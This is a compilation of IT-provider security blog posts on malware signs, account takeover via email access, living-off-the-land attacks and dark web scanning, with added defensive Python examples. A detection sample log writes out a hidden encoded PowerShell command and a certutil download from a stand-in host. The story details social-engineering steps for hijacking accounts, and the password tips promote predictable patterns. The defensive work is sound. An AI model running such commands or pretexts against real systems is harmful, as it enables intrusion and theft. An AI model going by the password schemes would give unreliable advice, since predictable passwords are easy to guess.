Signs That Your Computer May Be Infected with Malware

Approximately 34% of businesses take a week or longer to regain access to their data and systems once hit with a malware attack. Malware is an umbrella term that encompasses many different types of malicious code. It can include:

  • Viruses
  • Ransomware
  • Spyware
  • Trojans
  • Adware
  • Keyloggers
  • And more

The longer that malware sits on your system unchecked, the more damage it can do. Most forms of malware have a directive built in to spread to as many systems as possible. So, if not caught and removed right away, one computer could end up infecting 10 more on the same network in no time.

Early detection is key so you can disconnect an infected device from your network and have it properly cleaned by a professional.

Keep an eye out for these key warning signs of malware infection so you can jump into action and reduce your risk.

STRANGE POPUPS ON YOUR DESKTOP

Some forms of malware can take on the disguise of being an antivirus app or warranty notice that pops up on your screen. Hackers try to mimic things that users may have seen from a legitimate program, so they’ll be more apt to click without thinking. If you begin to see a strange “renew your antivirus” subscription alert or a warranty renewal that doesn’t quite make sense, these could be signs that your PC has been infected with adware or another type of malware.

NEW SLUGGISH BEHAVIOR

Computers can become sluggish for a number of reasons, including having too many browser tabs open at once or running a memory-intensive program. But you’ll typically know your computer and the types of things that slow it down.

If you notice new sluggish behavior that is out of the ordinary, this could be an infection. One example would be if you don’t have any programs open except Notepad or another simple app, and yet you experience freezing.

When malware is running in the background, it can often eat up system resources and cause your system to get sluggish.

APPLICATIONS START CRASHING

Applications should not just crash out of the blue. There is always a reason. Either the software is faulty, there’s been an issue with an update, or something else may be messing with that application’s files.

If you suddenly experience apps crashing, requiring you to restart the app or reboot your system, this is another telltale sign that a virus, trojan, or other malicious code has been introduced.

YOUR BROWSER HOME PAGE IS REDIRECTED

If you open your browser and land on a homepage that is not the one you normally see, have your PC scanned for malware right away. Redirecting a home page is a common ploy of certain types of malware.

The malware will infect your system and change the system setting for your default browser home page. This may lead you to a site filled with popup ads or to another type of phishing site.

Just trying to change your homepage back in your settings won’t fix the situation. It’s important to have the malware removed.

SUDDEN REBOOTS

Another annoying trait of certain types of malicious code is to make your system reboot without warning.

This can cause you to lose the work you’ve just done and can make it difficult to get anything done. This may happen when malware is changing core system files behind the scenes. With files corrupted, your system becomes unstable and can often reboot unexpectedly.

YOU’RE MISSING HARD DRIVE SPACE

If you find that a good deal of your hard drive space that used to be open is now gone, it could be a malware infection taking up your space. Some types of malware may make copies of files or introduce new files into your system.

They will cleverly hide, so don’t expect to see the word “malware” on a file search. Instead, the dangerous activities will usually be masked by a generic-sounding name that you mistake for a normal system file.

YOU RUN ACROSS CORRUPTED FILES

If you open a file and find it corrupted, this could be a red flag that ransomware or another form of malware has infected your system.

While files can occasionally become corrupt for other reasons, this is a serious issue that deserves a thorough malware scan if you see it.

PC “PROCESSING SOUNDS” WHEN THERE SHOULDN’T BE

Most of us are familiar with those “thinking sounds” when our computer is processing something memory-intensive. You’ll usually hear a type of whirring that will go away once you finish that activity.

If you begin hearing this processing sound when you’re not doing anything particularly intense on your computer, this could be a sign that malware is running in the background and it should be checked out.
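The warning signs above are easier to judge against a known-good baseline than by feel. The following Python script is an added example, not part of the original article or its source: it compares two constructed snapshots of a PC (a baseline taken when the machine was healthy, and a current reading) and reports which of the signs are present. The field names, the thresholds, and all sample values, including the generic-sounding process name svchost32.exe, are assumptions invented for the illustration.

```python
from dataclasses import dataclass, field


@dataclass
class Snapshot:
    """One reading of a PC; every field is something a help desk can record by hand."""
    free_disk_gb: float
    browser_homepage: str
    unexpected_reboots_7d: int
    app_crashes_7d: int
    idle_cpu_by_process: dict = field(default_factory=dict)   # process name -> % CPU while idle
    startup_entries: set = field(default_factory=set)          # programs set to run at login


# Thresholds are assumptions chosen for the illustration, not values from the article.
DISK_DROP_GB = 10.0
IDLE_CPU_PERCENT = 20.0
REBOOT_LIMIT = 2
CRASH_LIMIT = 3


def compare(baseline: Snapshot, current: Snapshot) -> list:
    """Return (sign, detail) pairs for each warning sign present in `current`."""
    findings = []
    drop = baseline.free_disk_gb - current.free_disk_gb
    if drop >= DISK_DROP_GB:
        findings.append(("missing disk space", f"{drop:.1f} GB less free than at baseline"))
    if current.browser_homepage != baseline.browser_homepage:
        findings.append(("home page redirected",
                         f"{baseline.browser_homepage} -> {current.browser_homepage}"))
    if current.unexpected_reboots_7d >= REBOOT_LIMIT:
        findings.append(("sudden reboots", f"{current.unexpected_reboots_7d} in the last 7 days"))
    if current.app_crashes_7d >= CRASH_LIMIT:
        findings.append(("applications crashing", f"{current.app_crashes_7d} in the last 7 days"))
    # A process that is busy while the user is idle, and was not busy at baseline.
    for proc, cpu in sorted(current.idle_cpu_by_process.items()):
        usual = baseline.idle_cpu_by_process.get(proc, 0.0)
        if cpu >= IDLE_CPU_PERCENT and cpu > 2 * usual:
            findings.append(("busy while idle", f"{proc} at {cpu:.0f}% CPU with nothing open"))
    # Anything new that starts at login deserves a look.
    for entry in sorted(current.startup_entries - baseline.startup_entries):
        findings.append(("new startup entry", entry))
    return findings


def verdict(findings: list) -> str:
    """Turn the finding count into the article's advice."""
    if not findings:
        return "no warning signs"
    if len(findings) == 1:
        return "one warning sign: watch it and scan if it persists"
    return "multiple warning signs: disconnect from the network and have the PC cleaned"


# Constructed sample readings. "svchost32.exe" is an invented generic-sounding name.
BASELINE = Snapshot(free_disk_gb=120.0, browser_homepage="https://intranet.example.com",
                    unexpected_reboots_7d=0, app_crashes_7d=0,
                    idle_cpu_by_process={"explorer.exe": 1.0, "notepad.exe": 0.5},
                    startup_entries={"OneDrive", "Teams"})
CURRENT = Snapshot(free_disk_gb=96.0, browser_homepage="http://search-deals.example.net",
                   unexpected_reboots_7d=3, app_crashes_7d=1,
                   idle_cpu_by_process={"explorer.exe": 1.2, "notepad.exe": 0.4, "svchost32.exe": 45.0},
                   startup_entries={"OneDrive", "Teams", "svchost32"})

if __name__ == "__main__":
    for sign, detail in compare(BASELINE, CURRENT):
        print(f"[{sign}] {detail}")
    print(verdict(compare(BASELINE, CURRENT)))
```

Run as-is it lists five findings for the constructed current reading (the single crash stays below the threshold) and recommends disconnecting the machine. The value of the approach is the baseline: a process using 45% CPU means nothing on its own, but the same process absent from last month's snapshot is worth a question.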

GET EXPERT MALWARE SCANNING & REMOVAL

Free online malware and virus scans aren’t very reliable. Instead, come to a professional that can ensure your entire system is cleaned properly.

Article used with permission from The Technology Press.

Email Security Hits Home For CEO, Mike Kupfer

How I Stole Everything From My Brother While He Was Laid up In A Texas Hospital ICU.

Ok first off, while the rest of this story will be a true story about my personal experience with handling my brother’s financial life over the past 6 months, the title is…well, a bit of clickbait. In fact, it should be titled “How I COULD have stolen everything from my brother while he was laid up in the burn ICU.”

In fact, as my mother’s favorite child and a good brother, all actions taken with my access to his financials were to his benefit. However, had a “bad actor” received even the small set of credentials I had been given, they could have wreaked a lot of havoc on my brother. Honestly, with much more ease than I would have ever expected, and I have been around IT security for years.

On July 19, 2021, my brother was in a terrible accident. A house fire from which he honestly had no business surviving. The first day we got to the hospital, we were told that if he was to survive, we should expect an extended stay in the burn ICU. We were told to expect months.

While his health was of the utmost importance in those first couple of weeks, I did know that his laptop, wallet, and phone had been left at the site of the fire, and since the home was left pretty much unsecured, it probably made sense to make sure my brother’s credit was locked with the credit agencies and his financial accounts were monitored.

Every week or 10 days there would be a day or two that my brother was able to communicate, although admittedly not very well. When the first of those days came, I was able to ask him his login and password for his Yahoo email account, his main email. He struggled to remember the exact password, but after a few guesses I had access to his account.

The rest of this story should be read as a cautionary tale that someone, even with just simple e-mail credentials, can cause great harm. You might think all of your vendors make it difficult to hijack your account; I did. While managing my brother’s finances, I found out this is not always the case. Here are some of the “cracks” I discovered with the different types of institutions.

Credit Agencies

The first place I called was the credit agencies, to put a stop on any attempts to run a credit report in his name. Remember, at this point I don’t have official power of attorney because he has yet to have a fully coherent enough day to do paperwork (nor the use of his hands to even hold a pen).

I started with the credit agencies, and these were the only companies where I said that I WAS my brother. Since I had his social security number, his birthday, and access to his email, I figured I could pull it off. For the most part I did, but to their credit, they asked me a handful of questions specific to his credit in addition to the traditional credentials. For instance, they asked which of the following streets he had lived on in the past 10 years and offered multiple choice. These questions I would not likely have known, and my cover would have been blown. However, my niece was sitting next to me, and SHE knew the answers to these questions. 1st MISSION ACCOMPLISHED: we got access and were able to put a freeze on his credit.

It taught me something though. Getting access to his banks and credit cards might not be so easy even with his information. I decided moving forward that I would always come clean and tell the customer service people I was calling that I was in fact Mike, and I was calling on behalf of my brother, but had all needed information. This is when things began to get interesting, and a bit scary.

Credit Cards

My brother had a lot of credit cards. He liked to have a couple he would use for expenses and getting points etc., and others with small limits that he used once a month and paid off just to get his credit rating boosted. There were some differences in how these banks dealt with my requests to get online access so that I could manage my brother’s account. Most secured the account with a basic username and password, and email as a 2nd form of authentication. Since his email was almost always his username, all I needed to do was request a new password and the system would send a new “reset password” link to my brother’s email, which I had access to. Bottom line: on most of these accounts, having nothing more than a story and email access, I was able to take over access to his credit cards as if I were him.

Cell Phone

This was my favorite. I did not have a login or password. I called in and told the customer service rep that I was calling on behalf of my brother and looking to get access so that I could replace his phone for him. (I actually needed this because some companies with stronger procedures required his cell phone for the second authenticator and not his email.) They did ask if I had his PIN, which I literally guessed. He CONFIRMED that was the PIN. However, he insisted that he “get approval” directly from my brother. So even though I explained that my brother was in the hospital and getting him on the phone was not an easy task, they made me get him on the phone and give a verbal OK to allow me on his account. Even though my brother was not able to remember his PIN, because the service manager had confirmed it with me, I was able to text it to my brother’s nurse and tell him to give that PIN. This seems like a decent policy, but honestly, I could have had him call me on a different phone line or an accomplice, so it seemed kind of stupid to require speaking with my brother. At least I was not just able to talk my way into a representative changing security protocol.

Banks

Banks were also an interesting bunch. My brother banked with 2 banks. One of which I was getting nowhere with until I had full Power of Attorney. So, from a security standpoint they were solid. The other bank was one that my brother had a relationship with. He would like to go into the banks and talk to people. That is just how my brother is. When I called them and tried to get access to his accounts, I was amazed at just how close a relationship could have become a security breach had I been a bad actor. Basically, when I called the bank, they had heard about this fire and when I told them it was my brother’s home, they were very eager to help in any way. They did have their security protocols but since they knew my brother, I had them looking into how I could get access to his online accounts. At one point, I was told that when the teller who knew my brother came back from lunch, she would call me, and I could put my brother on the phone so he could give a verbal approval of my access. If that teller “felt comfortable” that the person on the other end of the line “was in fact my brother,” then I could have the access. I was shocked but wanted the access. So, I kept my mouth shut. When the branch manager did call me back, they told me this would not work. NOT because it was a security risk, but because at that branch, they did not have the ability to record calls, and so there could be no record. So, they inadvertently avoided basically giving me access and probably breaking bank security protocol.

Financial/Cryptocurrency Account

When it came to gaining access to my brother’s cryptocurrency account, the security was solid. Perhaps too solid. I had to jump through so many hoops (with very little customer service help, and that only via email) that it literally took me over a month, and a physical trip to my brother in Dallas, to finally gain access. My advice on these types of accounts is not so much about how to improve your security, but rather make sure you UNDERSTAND their policies and prepare for another party to be able to get access if needed. This account was one of the most important that we get into as it had a majority of his available funds, yet it took me almost a month to get access because their security is so tight and not really set up for an emergency like the one my brother was in. If you have money in a particular account, make sure you know their access policy and prepare for that. There were literally days I thought I might never get into this account for my brother. I don’t mean that figuratively.

CONCLUSIONS

  • FIRST AND FOREMOST – PROTECT YOUR EMAIL CREDENTIALS!!!

So many companies use email as the main way to verify a request for a new password. If a bad actor has this data, they can call every vendor, bank, credit card company, or personal contact and see if having those credentials can get them other, more private credentials. What I found out with this experience is they can, and not with much more effort than requesting a new password and then locking you out. Having a managed IT provider in Chicago take a look at your email protection status is a great idea.
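The weakness described in the credit card and conclusion sections above, a reset link sent to the very mailbox the attacker holds, is easy to see in code. The following Python example is added here and is not code from the article or from any vendor mentioned in it. It models a small reset service that issues single-use, short-lived links, and contrasts a flow where the emailed link alone changes the password with one that also demands a code delivered over a second channel (a phone, as the article's stronger vendors required). The class and method names, the in-memory store, and the 15-minute and 5-minute lifetimes are assumptions.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60   # assumption: a reset link is good for 15 minutes
CODE_TTL_SECONDS = 5 * 60     # assumption: a second-factor code is good for 5 minutes


def _digest(value: str) -> str:
    # Store only hashes of secrets, so a dump of the table is not directly usable.
    return hashlib.sha256(value.encode()).hexdigest()


class ResetService:
    """In-memory account store with a weak and a hardened reset flow (constructed)."""

    def __init__(self, clock=time.time):
        self.clock = clock              # injectable so expiry can be tested
        self.password_hashes = {}       # username -> hash of password (demo only)
        self.reset_tokens = {}          # hash(token) -> (username, expires_at)
        self.second_factor = {}         # username -> (hash(code), expires_at)

    def register(self, username, password):
        self.password_hashes[username] = _digest(password)

    def check_password(self, username, password):
        stored = self.password_hashes.get(username)
        return stored is not None and hmac.compare_digest(stored, _digest(password))

    # Step 1 for both flows: mint the link that is emailed to the user.
    def request_reset(self, username):
        token = secrets.token_urlsafe(32)
        self.reset_tokens[_digest(token)] = (username, self.clock() + TOKEN_TTL_SECONDS)
        return token   # returned here only so the demo can "read the mailbox"

    def _consume_token(self, token):
        entry = self.reset_tokens.pop(_digest(token), None)   # pop: a link works once
        if entry is None:
            return None
        username, expires_at = entry
        return username if self.clock() <= expires_at else None

    # Weak flow: whoever reads the mailbox owns the account.
    def reset_email_only(self, token, new_password):
        username = self._consume_token(token)
        if username is None:
            return False
        self.password_hashes[username] = _digest(new_password)
        return True

    # Hardened flow: the link alone is not enough; a code from a second channel is required.
    def issue_second_factor(self, username):
        code = f"{secrets.randbelow(10 ** 6):06d}"
        self.second_factor[username] = (_digest(code), self.clock() + CODE_TTL_SECONDS)
        return code   # in production sent by SMS or authenticator app, never by email

    def reset_with_second_factor(self, token, code, new_password):
        username = self._consume_token(token)
        if username is None:
            return False
        entry = self.second_factor.pop(username, None)   # one guess per link
        if entry is None:
            return False
        code_hash, expires_at = entry
        if self.clock() > expires_at or not hmac.compare_digest(code_hash, _digest(code)):
            return False
        self.password_hashes[username] = _digest(new_password)
        return True


def email_only_takeover() -> bool:
    """True if someone reading the mailbox can change the password with nothing else."""
    svc = ResetService()
    svc.register("brother", "original-pw")
    link = svc.request_reset("brother")                 # lands in the mailbox
    return svc.reset_email_only(link, "new-pw") and svc.check_password("brother", "new-pw")


def second_factor_blocks_mailbox_only() -> bool:
    """True if the hardened flow refuses link + wrong code, and accepts link + real code."""
    svc = ResetService()
    svc.register("brother", "original-pw")
    link = svc.request_reset("brother")
    real_code = svc.issue_second_factor("brother")
    wrong_code = "000000" if real_code != "000000" else "000001"
    refused = not svc.reset_with_second_factor(link, wrong_code, "new-pw")
    still_original = svc.check_password("brother", "original-pw")
    link = svc.request_reset("brother")                 # the owner tries again properly
    real_code = svc.issue_second_factor("brother")
    accepted = svc.reset_with_second_factor(link, real_code, "new-pw")
    return refused and still_original and accepted


def reuse_and_expiry() -> tuple:
    """(first use ok, second use of the same link refused, expired link refused)."""
    now = [1_700_000_000.0]
    svc = ResetService(clock=lambda: now[0])
    svc.register("brother", "original-pw")
    link = svc.request_reset("brother")
    first = svc.reset_email_only(link, "pw1")
    second = svc.reset_email_only(link, "pw2")
    link = svc.request_reset("brother")
    now[0] += TOKEN_TTL_SECONDS + 1
    stale = svc.reset_email_only(link, "pw3")
    return first, second, stale
```

The single-use and expiry rules limit how long a stolen link stays useful, but they do not change the outcome of the weak flow: `email_only_takeover()` still returns True, which is exactly the situation the article describes. Only the second channel turns the mailbox from a master key into one factor among two.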

  • DON’T USE THE SAME PASSWORD OR PIN NUMBERS FOR MULTIPLE VENDORS

How was I able to “guess” my brother’s cell PIN? Easy. I know he is a Cubs fan and he had used a couple of Cubs player numbers as his 4-digit code. He had used the same code with another vendor I had earlier gained access to, and so I had a good idea this would be the same and BAM, it was. If you MUST use similar passwords for convenience, use a password scheme that is easy to remember but would make each site unique. For instance:

  • The name of the service, followed by
  • Your birthday followed by
  • A dollar sign

So that your login to Amazon might be (if your b-day was March 25th) Amazon0325$. Then on your Life Insurance website it could be Insurance0325$, and so on. Pro tip on this idea: use tiers of difficulty in your password schemes, so that, let’s say, the sample above would be good for all less threatening websites, but use a more difficult scheme for your financial and banking sites. These are the things you FOR SURE do not want people to get into. For those you might do something like:

  • The service name, followed by
  • Your mom’s full birthday, followed by
  • Your dog’s name, followed by
  • Two # signs.

So that might look something like Banking062938Fido##. MUCH more challenging to crack by man or machine.

  • KNOW THE REQUIREMENTS FOR ACCESS FOR ANY VENDOR FINANCIAL OR OTHERWISE AND PLAN FOR EASY ACCESS FOR SOMEONE BESIDES YOU.

My brother (like many people) was not fully prepared for a months-long hospital stay. Really it is mostly the financials that can get sort of tricky, and they are likely to be more sticklers regarding security compliance (although not always). Find out what they would ask for if YOU were not able to physically get access. In my brother’s case he lost his wallet in the fire. Had I known how important a copy of his driver’s license would have been in receiving access to his crypto account, I could have made a copy and kept it in a file in my home in case of emergency. Luckily, while he was in the hospital, access to this money was not all that important, but had he needed this money sooner than “eventually” it could have been a problem since it took over a month for me to gain access.

  • IF YOUR ORGANIZATION NEEDS OUTSIDE HELP WITH SECURITY DON’T HESITATE TO PLAN FOR THIS.

No matter if you have an IT staff internally, use a Managed Services Provider (MSP), or have a combination of both similar to Black Diamond’s Co-Managed Services, make sure you are consistently planning, executing and if need be, adjusting your defense against bad actors looking to cost your organization money.

My brother is still in recovery. He’s doing as well as can be expected, perhaps even better than expected, which is great. He is back to handling his own credit cards and bills and has changed a couple of security habits.

I am pretty sure he is grateful his brother is an IT and cyber security consultant and not a cybercriminal. If he is not, he should be! As far as my being mom’s favorite, I think my brother and I both realize that was my sister!

2021 Year End Security Review


2021 has been an incredibly difficult year to protect your organization from cyber adversaries. It has been “the year of the zero-day exploit,” with more vulnerabilities in the first 11 months of the year than ever recorded before. As we head into the end of the year and the holiday season, Black Diamond Solutions wanted to provide a few insights into the full year of zero-day events.

  • A tough year to manage IT – Whether you have an internal IT team, use an MSP, or a combination of both, reliance on patches alone is just not enough. In particular, in circumstances where no patch is available, it is paramount that your security stack and team are ready to monitor, detect, and provide an immediate response to the earliest signs of a threat.
  • Actions speak louder than… – Amidst the attacks of 2021, security providers focused on rapid response and action led the charge in fighting back against zero-day vulnerabilities. True security is more than detection and alerts – it’s about eliminating the threats so that IT teams and businesses can stay focused on their business.
  • Long dwell times are a thing of the past – If not addressed immediately, attacks from info stealers quickly spiral out of control. Once an adversary gains initial access, their main objective is to spread their reach and malware to cause as much cost to the victim as possible. Gone are the days of long dwell times. After a breach, malicious actions occur within minutes.
  • Living off the land – Adversaries are increasingly using legitimate credentials to enter your environment. Then, using no malware at all, they ‘live off the land’. This means they leverage only native programs and tools available in the compromised environment to blend in before finally deploying their malware. This makes detection extremely difficult for legacy tools such as anti-virus and anti-malware.
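Because “living off the land” involves only built-in programs, detection has to key on how those programs are used rather than on a malicious file that anti-virus could match. The following Python example is added here and is not from Black Diamond Solutions or the original post: it runs a few widely used parent/child and command-line rules over constructed process-creation records of the kind an endpoint sensor produces. The record format, the rule set, and the sample log lines (hosts, users, paths) are all assumptions made up for the illustration.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent: str    # parent image name, lower-cased
    image: str     # child image name, lower-cased
    cmdline: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one 'host|user|parent|image|cmdline' record (a constructed format)."""
    host, user, parent, image, cmdline = line.split("|", 4)
    return ProcessEvent(host, user, parent.lower(), image.lower(), cmdline)


# Native programs that are normal on their own but suspicious in these combinations.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOADERS = {"certutil.exe", "bitsadmin.exe"}

URL_RE = re.compile(r"https?://", re.I)
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.I)
HIDDEN_RE = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.I)


def evaluate(ev: ProcessEvent) -> list:
    """Return the reasons this event looks like living-off-the-land activity."""
    reasons = []
    if ev.parent in OFFICE_APPS and ev.image in SCRIPT_HOSTS:
        reasons.append(f"{ev.parent} spawned {ev.image}")
    if ev.image in DOWNLOADERS and URL_RE.search(ev.cmdline):
        reasons.append(f"{ev.image} given a URL on the command line")
    if ev.image == "powershell.exe":
        if ENCODED_RE.search(ev.cmdline):
            reasons.append("powershell started with an encoded command")
        if HIDDEN_RE.search(ev.cmdline):
            reasons.append("powershell started with a hidden window")
    return reasons


def scan(log_text: str) -> list:
    """Return [(event, reasons)] for every record that triggered at least one rule."""
    flagged = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        reasons = evaluate(ev)
        if reasons:
            flagged.append((ev, reasons))
    return flagged


# Constructed records; hosts, users, paths and the encoded-command placeholder are invented.
SAMPLE_LOG = r"""
ws01|alice|explorer.exe|winword.exe|"C:\Program Files\Microsoft Office\WINWORD.EXE" /n
ws01|alice|winword.exe|powershell.exe|powershell.exe -w hidden -enc AAAAAAAA
ws02|bob|explorer.exe|certutil.exe|certutil.exe -urlcache -f http://files.example.net/update.dat update.dat
ws03|carol|explorer.exe|cmd.exe|cmd.exe /c dir
ws03|carol|services.exe|svchost.exe|svchost.exe -k netsvcs
"""

if __name__ == "__main__":
    for ev, reasons in scan(SAMPLE_LOG):
        print(f"{ev.host} {ev.user} {ev.image}: " + "; ".join(reasons))
```

Two of the five constructed records are flagged; the rest, including a plain cmd.exe /c dir, pass. None of the rules needs a file hash, which is the point: with no malware on disk, the process tree and command line are what a detection and response team has to work from, and the rules have to be tuned to each environment so that legitimate admin scripts do not drown the real alerts.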

Despite the challenges, Black Diamond Solutions appreciates your business in 2021, and we look forward to continually helping you, our clients, build and protect your IT environment in 2022.

Our security operations center continues to offer diligent 24x7x365 managed detection and response to our security clients. We remain agile and vigilant, moving faster than the “bad actors” to keep your environment safe.

Want to start out 2022 with a little more peace of mind regarding the security of your environment?

Sign up for a FREE DEMO of our SOC capabilities!

Dark Web Scanning: Security Blankets

BDS Dark Web Scanning

What is the “Dark Web”?

You probably have heard dark web scanning is a great way to prevent a data breach. But what does that even mean? The Dark Web is a part of the World Wide Web that uses darknets or overlays and is only accessible through specific software programs such as the Tor Browser. Unlike the surface web, the deep web is not indexed on search engines like Google and Bing. Using the Dark Web, individuals on private networks can conduct business on dark web marketplaces and communicate anonymously without giving up identifying information such as location. A dark web marketplace serves as a digital black market allowing criminals to gain access to leaked data and personal information without the ability to be tracked down. Dark web sites conduct criminal activity through the sale and distribution of credit card details, medical records, passwords and other sensitive information, all bought and sold relatively inexpensively. Worse, the information being sold can be sold over and over again to many “dark agents,” giving multiple potential hackers access to user accounts and other stolen data.

The loss of employee or company data can be devastating to an organization for multiple reasons. The costs of recovering it can be extraordinary, as well as the reputational losses if you legally or morally need to let your clients and vendors know you have experienced a breach.

This is why some organizations choose to run ongoing dark web scans for domains within their organization. Now, you might ask, “What exactly is dark web scanning?” Dark web scans are done by dark web scanners, which are tools designed to find data leaks across the entire dark web. Cyber professionals scan the dark web for full or partial amounts of sensitive information affiliated with your company’s domains and IP addresses. The types of items normally found are business usernames, personal passwords, business passwords as well as other business and personal information. By gathering information about what data is floating around the dark web your IT team or provider can easily make the needed changes both in security (changing user names or passwords for example) and company security policy (not allowing personal emails to be used for company business for example.)
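The matching step described above, as an added example that is not the vendor's own scanner: the Python below parses a constructed extract of a breach feed, keeps only addresses under the monitored company domains (subdomains included), and reports which accounts appear and which show up in more than one dump, the “sold over and over” case mentioned earlier. The feed format, the domain names, and every address are constructed for the illustration; a real feed would also carry the breach date and what was exposed.

```python
import re
from collections import Counter, defaultdict

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def parse_feed(text: str) -> list:
    """Return (email, source) pairs from 'source,email,...' lines (constructed feed format)."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        source, _, rest = line.partition(",")
        match = EMAIL_RE.search(rest)
        if match:
            # Lower-case so Alice@Example.com and alice@example.com count as one account.
            records.append((match.group(0).lower(), source.strip()))
    return records


def domain_of(email: str) -> str:
    return email.rsplit("@", 1)[1]


def match_domains(records, monitored_domains) -> dict:
    """Map each email under a monitored domain (or a subdomain of one) to the dumps it appears in."""
    monitored = {d.lower().lstrip("@") for d in monitored_domains}
    hits = defaultdict(set)
    for email, source in records:
        domain = domain_of(email)
        if domain in monitored or any(domain.endswith("." + d) for d in monitored):
            hits[email].add(source)
    return dict(hits)


def report(hits: dict) -> dict:
    """Dashboard summary: totals, per-domain counts, resold accounts, and the follow-up list."""
    return {
        "accounts": len(hits),
        "per_domain": dict(Counter(domain_of(e) for e in hits)),
        "seen_in_multiple_dumps": sorted(e for e, sources in hits.items() if len(sources) > 1),
        "actions": sorted(f"force password reset and check MFA: {e}" for e in hits),
    }


# Constructed feed extract; the sources, addresses and domains are invented.
SAMPLE_FEED = """\
# source,email,remaining fields omitted
combo-2021-03,alice@example.com,hash:<omitted>
combo-2021-03,bob@gmail.com,hash:<omitted>
forum-dump-07,Alice@Example.com,hash:<omitted>
forum-dump-07,carol@mail.example.com,hash:<omitted>
forum-dump-07,dave@example.org,hash:<omitted>
shop-leak-11,erin@notexample.com,hash:<omitted>
"""

MONITORED = ["example.com"]

if __name__ == "__main__":
    summary = report(match_domains(parse_feed(SAMPLE_FEED), MONITORED))
    for key, value in summary.items():
        print(key, value)
```

Note what the domain filter cannot see: bob@gmail.com may well be an employee's personal address used for company business, which is exactly why the policy change mentioned above (no personal email for company accounts) matters as much as the scan itself. The suffix check is deliberate, so that notexample.com is not treated as a match for example.com.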

Why is dark web scanning important?

Human error is one of the leading causes of data breaches, so it’s important to have layers of security in order to protect your company. A dark web scan can help you find and fix human errors before they become a problem. Additionally, cybercriminals are always looking for new ways to steal information, and not having the dark web monitored means they have the upper hand. Dark web scanners can not only monitor your company’s sensitive data but also fight against those who threaten your company’s existence!

Dark Web Scan Proactive Monitoring

Having a dark web monitoring service on a regular basis is a smart idea for the following reasons:

  • With so much now dependent on a digital world, it is a very good idea to have your company domains proactively monitored and reported on. There are simply too many credentials out there, and so even a small percentage of stolen data can cost a company immensely.
  • By actively monitoring the dark web as it pertains to your domains and company, your IT team or provider can, over time, significantly lower the amount and types of data that are getting leaked. This can be done through training of the end user as well as network settings that could restrict the types of end user activities that result in data dumps.

Comprehensive Reporting

In addition to running a dark web scan and learning about credentials on the dark web, getting a comprehensive dashboard report is a great feature of most dark web monitoring services. These reports show management data that is floating on the dark web, along with insights as to how data breaches occurred, allowing the IT team to react and set up additional security system policies and procedures based on real data. (see example report page below.)

Dark Web Scans | Final Considerations

It is pretty clear to see the benefits of dark web scanning for any organization. It is easier to fight an enemy knowing you have the upper hand than hope you can gain that upper hand back after an account takeover occurs. A trusted team of cyber security professionals can help you gain that upper hand and keep it with proactive dark web monitoring. This special software helps fight against those that threaten your company’s existence. By gathering information about your personal data floating around the dark web, and analyzing comprehensive reports with insights, your IT team is better equipped to prevent a future data breach. If you’re concerned about this issue in your organization or want more information on dark web scanning, contact us today! We offer several security services designed to protect your personal information from leaking onto the dark web, so feel free to reach out with questions anytime!